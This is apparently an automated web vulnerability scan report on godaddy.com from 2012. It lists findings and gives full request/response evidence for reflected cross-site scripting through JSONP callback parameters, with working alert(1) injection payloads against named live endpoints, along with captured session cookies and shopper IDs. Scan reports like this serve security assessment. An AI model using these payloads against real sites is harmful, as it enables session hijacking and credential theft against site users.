9.7. http://www.godaddy.com/NewsCenter/releases.aspx

9.8. http://www.godaddy.com/NewsCenter/testimonials.aspx

9.9. http://www.godaddy.com/Payment/payment-options.aspx

9.10. http://www.godaddy.com/SocialMedia/social-media.aspx

9.11. http://www.godaddy.com/affiliates/affiliate-program.aspx

9.12. http://www.godaddy.com/agreements/ShowDoc.aspx

9.13. http://www.godaddy.com/appraisal/domain-appraisal.aspx

9.14. http://www.godaddy.com/auctions/domain-auctions.aspx

9.15. http://www.godaddy.com/auctions/popups/buy-sell-explanation.aspx

9.16. http://www.godaddy.com/auctions/popups/escrow.aspx

9.17. http://www.godaddy.com/business/mobile-app.aspx

9.18. http://www.godaddy.com/catalog.aspx

9.19. http://www.godaddy.com/charity/roundupforcharity.aspx

9.20. http://www.godaddy.com/design/web-design.aspx

9.21. http://www.godaddy.com/domains/bulk-domain-transfer.aspx

9.22. http://www.godaddy.com/domains/controls/resultspricechartbulk.aspx

9.23. http://www.godaddy.com/domains/domain-broker.aspx

9.24. http://www.godaddy.com/domains/domain-broker.aspx/

9.25. http://www.godaddy.com/domains/domain-transfer.aspx

9.26. http://www.godaddy.com/domains/domain_offer.aspx

9.27. http://www.godaddy.com/domains/popups/chart.aspx

9.28. http://www.godaddy.com/domains/search.aspx

9.29. http://www.godaddy.com/domains/search.aspx/u0027

9.30. http://www.godaddy.com/domains/searchbulk.aspx

9.31. http://www.godaddy.com/domains/searchidn.aspx

9.32. http://www.godaddy.com/domains/searchresults.aspx

9.33. http://www.godaddy.com/domains/searchreview.aspx

9.34. http://www.godaddy.com/ecommerce/shopping-cart.aspx

9.35. http://www.godaddy.com/email/email-hosting.aspx

9.36. http://www.godaddy.com/email/online-storage.aspx

9.37. http://www.godaddy.com/gear/godaddy-gear.aspx

9.38. http://www.godaddy.com/hosting/grid/popups/prove-it-4gh.aspx

9.39. http://www.godaddy.com/hosting/grid/popups/why-you-need-4gh.aspx

9.40. http://www.godaddy.com/hosting/hosting.aspx

9.41. http://www.godaddy.com/hosting/jsoncontent/grid-hosting-technology.aspx

9.42. http://www.godaddy.com/hosting/popups/wst-sample-sites.aspx

9.43. http://www.godaddy.com/hosting/web-hosting.aspx

9.44. http://www.godaddy.com/hosting/web-hosting.aspx/

9.45. http://www.godaddy.com/hosting/website-builder.aspx

9.46. http://www.godaddy.com/hosting/website-builder.aspx/

9.47. http://www.godaddy.com/icann/domain_search.aspx

9.48. http://www.godaddy.com/jobs/default.aspx

9.49. http://www.godaddy.com/legal-agreements.aspx

9.50. http://www.godaddy.com/offers/hot-deals2.aspx

9.51. http://www.godaddy.com/popups/facebook-ads.aspx

9.52. http://www.godaddy.com/popups/fotolia.aspx

9.53. http://www.godaddy.com/popups/google-adwords.aspx

9.54. http://www.godaddy.com/popups/microsoft-advertising.aspx

9.55. http://www.godaddy.com/reseller/domain-reseller.aspx

9.56. http://www.godaddy.com/scholarship/default.aspx

9.57. http://www.godaddy.com/search-engine/seo-services.aspx

9.58. http://www.godaddy.com/site-map.aspx

9.59. http://www.godaddy.com/ssl/ssl-certificates.aspx

9.60. http://www.godaddy.com/ssl/ssl-certificates.aspx/

9.61. http://www.godaddy.com/ssl/ssl-open-source.aspx

9.62. http://www.godaddy.com/tlds/asia.aspx

9.63. http://www.godaddy.com/tlds/biz.aspx

9.64. http://www.godaddy.com/tlds/ca.aspx

9.65. http://www.godaddy.com/tlds/co-domain.aspx

9.66. http://www.godaddy.com/tlds/com.aspx

9.67. http://www.godaddy.com/tlds/info.aspx

9.68. http://www.godaddy.com/tlds/international-domain-names.aspx

9.69. http://www.godaddy.com/tlds/me.aspx

9.70. http://www.godaddy.com/tlds/mobi.aspx

9.71. http://www.godaddy.com/tlds/net.aspx

9.72. http://www.godaddy.com/tlds/org.aspx

9.73. http://www.godaddy.com/tlds/us.aspx

9.74. http://www.godaddy.com/tlds/ws.aspx

9.75. http://www.godaddy.com/tlds/xxx-domain.aspx

9.76. https://www.godaddy.com/Domains/Search.aspx

9.77. https://www.godaddy.com/Payment/payment-options.aspx

9.78. https://www.godaddy.com/agreements/showdoc.aspx

9.79. https://www.godaddy.com/domains/customize.aspx

9.80. https://www.godaddy.com/domains/domain-broker.aspx

9.81. https://www.godaddy.com/domains/popups/icannfee.aspx

9.82. https://www.godaddy.com/gdshop/browser_update.asp

9.83. https://www.godaddy.com/legal-agreements.aspx

9.84. https://www.godaddy.com/offers/hot-deals2.aspx

10. Email addresses disclosed

10.1. http://www.godaddy.com/

10.2. http://www.godaddy.com/Business/business-hosting.aspx

10.3. http://www.godaddy.com/NewsCenter/about-godaddy.aspx

10.4. http://www.godaddy.com/NewsCenter/marketing-opportunities.aspx

10.5. http://www.godaddy.com/NewsCenter/releases.aspx

10.6. http://www.godaddy.com/NewsCenter/testimonials.aspx

10.7. http://www.godaddy.com/Payment/payment-options.aspx

10.8. http://www.godaddy.com/SocialMedia/social-media.aspx

10.9. http://www.godaddy.com/affiliates/affiliate-program.aspx

10.10. http://www.godaddy.com/agreements/showdoc.aspx

10.11. http://www.godaddy.com/appraisal/domain-appraisal.aspx

10.12. http://www.godaddy.com/auctions/domain-auctions.aspx

10.13. http://www.godaddy.com/business/mobile-app.aspx

10.14. http://www.godaddy.com/catalog.aspx

10.15. http://www.godaddy.com/charity/roundupforcharity.aspx

10.16. http://www.godaddy.com/design/web-design.aspx

10.17. http://www.godaddy.com/domains/bulk-domain-transfer.aspx

10.18. http://www.godaddy.com/domains/domain-broker.aspx

10.19. http://www.godaddy.com/domains/domain-broker.aspx/

10.20. http://www.godaddy.com/domains/domain-transfer.aspx

10.21. http://www.godaddy.com/domains/domain_offer.aspx

10.22. http://www.godaddy.com/domains/search.aspx

10.23. http://www.godaddy.com/domains/search.aspx/u0027

10.24. http://www.godaddy.com/domains/searchbulk.aspx

10.25. http://www.godaddy.com/domains/searchidn.aspx

10.26. http://www.godaddy.com/domains/searchresults.aspx

10.27. http://www.godaddy.com/domains/searchreview.aspx

10.28. http://www.godaddy.com/ecommerce/shopping-cart.aspx

10.29. http://www.godaddy.com/email/email-hosting.aspx

10.30. http://www.godaddy.com/email/online-storage.aspx

10.31. http://www.godaddy.com/gear/godaddy-gear.aspx

10.32. http://www.godaddy.com/hosting/hosting.aspx

10.33. http://www.godaddy.com/hosting/web-hosting.aspx

10.34. http://www.godaddy.com/hosting/web-hosting.aspx/

10.35. http://www.godaddy.com/hosting/website-builder.aspx

10.36. http://www.godaddy.com/hosting/website-builder.aspx/

10.37. http://www.godaddy.com/icann/domain_search.aspx

10.38. http://www.godaddy.com/jobs/default.aspx

10.39. http://www.godaddy.com/legal-agreements.aspx

10.40. http://www.godaddy.com/offers/hot-deals2.aspx

10.41. http://www.godaddy.com/reseller/domain-reseller.aspx

10.42. http://www.godaddy.com/scholarship/default.aspx

10.43. http://www.godaddy.com/search-engine/seo-services.aspx

10.44. http://www.godaddy.com/site-map.aspx

10.45. http://www.godaddy.com/ssl/ssl-certificates.aspx

10.46. http://www.godaddy.com/ssl/ssl-certificates.aspx/

10.47. http://www.godaddy.com/ssl/ssl-open-source.aspx

10.48. http://www.godaddy.com/tlds/asia.aspx

10.49. http://www.godaddy.com/tlds/biz.aspx

10.50. http://www.godaddy.com/tlds/ca.aspx

10.51. http://www.godaddy.com/tlds/co-domain.aspx

10.52. http://www.godaddy.com/tlds/com.aspx

10.53. http://www.godaddy.com/tlds/info.aspx

10.54. http://www.godaddy.com/tlds/international-domain-names.aspx

10.55. http://www.godaddy.com/tlds/me.aspx

10.56. http://www.godaddy.com/tlds/mobi.aspx

10.57. http://www.godaddy.com/tlds/net.aspx

10.58. http://www.godaddy.com/tlds/org.aspx

10.59. http://www.godaddy.com/tlds/us.aspx

10.60. http://www.godaddy.com/tlds/ws.aspx

10.61. http://www.godaddy.com/tlds/xxx-domain.aspx

10.62. https://www.godaddy.com/Agreements/ShowDoc.aspx

10.63. https://www.godaddy.com/Domains/Search.aspx

10.64. https://www.godaddy.com/Payment/payment-options.aspx

10.65. https://www.godaddy.com/agreements/showdoc.aspx

10.66. https://www.godaddy.com/domains/customize.aspx

10.67. https://www.godaddy.com/domains/domain-broker.aspx

10.68. https://www.godaddy.com/gdshop/browser_update.asp

10.69. https://www.godaddy.com/legal-agreements.aspx

10.70. https://www.godaddy.com/offers/hot-deals2.aspx

11. Credit card numbers disclosed

11.1. http://www.godaddy.com/agreements/ShowDoc.aspx

11.2. http://www.godaddy.com/email/online-storage.aspx

12. Robots.txt file

12.1. http://www.godaddy.com/

12.2. https://www.godaddy.com/domains/customize.aspx

13. Cacheable HTTPS response

13.1. https://www.godaddy.com/domains/customize/JsonContent/ActivateYourDomain.aspx

13.2. https://www.godaddy.com/domains/customize/JsonContent/DomainPrivacyAndProtection.aspx

13.3. https://www.godaddy.com/domains/customize/JsonContent/DomainRegistrationInformation.aspx

13.4. https://www.godaddy.com/domains/customize/JsonContent/DomainSettings.aspx

14. HTML does not specify charset

15. Content type incorrectly stated

16. SSL certificate



1. Cross-site scripting (reflected)  next
There are 15 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organization in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.godaddy.com/Domains/Controls/JsonContent/DotTypePricing.aspx [callback parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /Domains/Controls/JsonContent/DotTypePricing.aspx

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 694d1%3balert(1)//c20bd392d3d was submitted in the callback parameter. This input was echoed as 694d1;alert(1)//c20bd392d3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Domains/Controls/JsonContent/DotTypePricing.aspx?tab=general&callback=tabFill694d1%3balert(1)//c20bd392d3d&targetDivId=tab2&tabFill=jsonp1330911735286&_=1330911735905 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/javascript, application/javascript, */*
Referer: http://www.godaddy.com/domains/search.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; PCSplitValue1=1; pagecount=5; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; GoogleADServicesgoogleadwordssearch=hbjjxbcaiaffadneicfbdagjqgiiggnd; BlueLithium_domainsearch=hbjjxbcaiaffadneicfbdagjqgiiggnd; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/DotTypePricing.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=tab=general&callback=tabFill694d1%3balert(1)%2f%2fc20bd392d3d&targetDivId=tab2&tabFill=jsonp1330911735286&_=1330911735905%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:50:59 GMT; path=/
Date: Mon, 05 Mar 2012 01:50:59 GMT
Content-Length: 29873

tabFill694d1;alert(1)//c20bd392d3d({"Html":"\r\n \u003cstyle type=\"text/css\"\u003e\r\n #pricing_table tr#table_header td#header_bg{background-image: url(http://img1.wsimg.com/fos/bkg/42293_chart_topbar.gif);background-color: tran
...[SNIP]...

1.2. http://www.godaddy.com/external/json/PcSetData.aspx [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /external/json/PcSetData.aspx

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload da5d4%3balert(1)//6bca1ef9933 was submitted in the callback parameter. This input was echoed as da5d4;alert(1)//6bca1ef9933 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /external/json/PcSetData.aspx?ci=17368&callback=pcj_setdatada5d4%3balert(1)//6bca1ef9933&pcj_setdata=jsonp1330912018995&_=1330912019114 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/javascript, application/javascript, */*
Referer: http://www.godaddy.com/domains/searchreview.aspx?pd=yes
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; PCSplitValue1=1; GoogleADServicesgoogleadwordssearch=hbjjxbcaiaffadneicfbdagjqgiiggnd; BlueLithium_domainsearch=keydqgeemhudugljzexamaxfhjofnevf; BlueLithium=ldubxiuhpfmhtbbiyjmelhwaahghdbma; GoogleADServicesgooglessl=zbaitefefbwexbmflgoethnixhqjvich; pagecount=14; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; BlueLithium_ssl=chsduddeifteyewceiebbfsifczdjdig; ShopperId1=keraxfoewfthxjhclejcpjejtagbwdif; preferences1=_sid=pgkbxbqaugxggitbjadgnhzcwaubviyf&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=http://www.godaddy.com/hosting/website-builder.aspx&sitename=www.godaddy.com&page=/domains/searchreview.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=pd=yes%26hpGoogleStatic%3d1&shopper=50585199&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Date: Mon, 05 Mar 2012 01:57:48 GMT
Content-Length: 213

pcj_setdatada5d4;alert(1)//6bca1ef9933({"pcCartCt":2,"pcExpDomCt":0,"pcFirstName":"","pcIsCdc":false,"pcIsDiscount":false,"pcIsTrusted":false,"pcRepEmail":"","pcRepExt":"","pcRepName":"","pcShopperId":"50585199"})

1.3. http://www.godaddy.com/hosting/popups/wst-quicktour-widget.aspx [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/popups/wst-quicktour-widget.aspx

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e65b4%3balert(1)//7a1a497d3dd was submitted in the callback parameter. This input was echoed as e65b4;alert(1)//7a1a497d3dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hosting/popups/wst-quicktour-widget.aspx?ci=44038&callback=popUpFille65b4%3balert(1)//7a1a497d3dd&targetDivId=quickTourDiv&popUpFill=jsonp1330911991097&_=1330912001996 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/javascript, application/javascript, */*
Referer: http://www.godaddy.com/hosting/website-builder.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; PCSplitValue1=1; GoogleADServicesgoogleadwordssearch=hbjjxbcaiaffadneicfbdagjqgiiggnd; BlueLithium_domainsearch=keydqgeemhudugljzexamaxfhjofnevf; BlueLithium=ldubxiuhpfmhtbbiyjmelhwaahghdbma; GoogleADServicesgooglessl=zbaitefefbwexbmflgoethnixhqjvich; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=14; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=http://www.godaddy.com/ssl/ssl-certificates.aspx&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; BlueLithium_ssl=chsduddeifteyewceiebbfsifczdjdig

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/hosting/website-builder.aspx&sitename=www.godaddy.com&page=/hosting/popups/wst-quicktour-widget.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=44038&callback=popUpFille65b4%3balert(1)%2f%2f7a1a497d3dd&targetDivId=quickTourDiv&popUpFill=jsonp1330911991097&_=1330912001996%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:19 GMT
Content-Length: 13446

popUpFille65b4;alert(1)//7a1a497d3dd({"Html":"\r\n \u003ccenter\u003e\r\n \u003cdiv id=\"cds-slides-tour\"\u003e\r\n \u003ctable cellspacing=\"0\" cellpadding=\"0\" border=\"0\"\u003e\r\n \u003ctr\u003e\r\n
...[SNIP]...

1.4. http://www.godaddy.com/shared/homepage2/1/popups/instant-page.aspx [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /shared/homepage2/1/popups/instant-page.aspx

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 36c6d%3balert(1)//954d4fc45f was submitted in the callback parameter. This input was echoed as 36c6d;alert(1)//954d4fc45f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shared/homepage2/1/popups/instant-page.aspx?ci=44918&callback=jsonContent._fill36c6d%3balert(1)//954d4fc45f&targetDivId=instantPageModal&jsonContent._fill=jQuery15104665068816393614_1330911036114&_=1330911054740 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.godaddy.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; pagecount=1; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=http://www.godaddy.com/&sitename=www.godaddy.com&page=/&server=M1PWCORPWEB137&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; HPBackground=Danica2

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/&sitename=www.godaddy.com&page=/shared/homepage2/1/popups/instant-page.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=44918&callback=jsonContent._fill36c6d%3balert(1)%2f%2f954d4fc45f&targetDivId=instantPageModal&jsonContent._fill=jQuery15104665068816393614_1330911036114&_=1330911054740%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:39 GMT
Content-Length: 40358

jsonContent._fill36c6d;alert(1)//954d4fc45f({"Html":"\r\n\u003cstyle type=\"text/css\"\u003e\n.modal_popin{background-color:#4f4f4f;border:solid 5px #adadad;width:585px;margin:0;padding:0;text-align:center;-moz-box-shadow:0 0 5px 4px #888;-webk
...[SNIP]...

1.5. http://www.godaddy.com/ssl/popups/ssl-quicktour-widget.aspx [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ssl/popups/ssl-quicktour-widget.aspx

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9bf28%3balert(1)//f4744af696b was submitted in the callback parameter. This input was echoed as 9bf28;alert(1)//f4744af696b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ssl/popups/ssl-quicktour-widget.aspx?ci=42475&callback=loadQuickTour9bf28%3balert(1)//f4744af696b&targetDivId=quickTourDiv&loadQuickTour=jsonp1330911995435&_=1330912000828 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/javascript, application/javascript, */*
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; PCSplitValue1=1; GoogleADServicesgoogleadwordssearch=hbjjxbcaiaffadneicfbdagjqgiiggnd; BlueLithium_domainsearch=keydqgeemhudugljzexamaxfhjofnevf; BlueLithium=ldubxiuhpfmhtbbiyjmelhwaahghdbma; GoogleADServicesgooglessl=zbaitefefbwexbmflgoethnixhqjvich; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=14; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=http://www.godaddy.com/ssl/ssl-certificates.aspx&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; BlueLithium_ssl=chsduddeifteyewceiebbfsifczdjdig

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/ssl/ssl-certificates.aspx&sitename=www.godaddy.com&page=/ssl/popups/ssl-quicktour-widget.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=42475&callback=loadQuickTour9bf28%3balert(1)%2f%2ff4744af696b&targetDivId=quickTourDiv&loadQuickTour=jsonp1330911995435&_=1330912000828%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:18 GMT
Content-Length: 13341

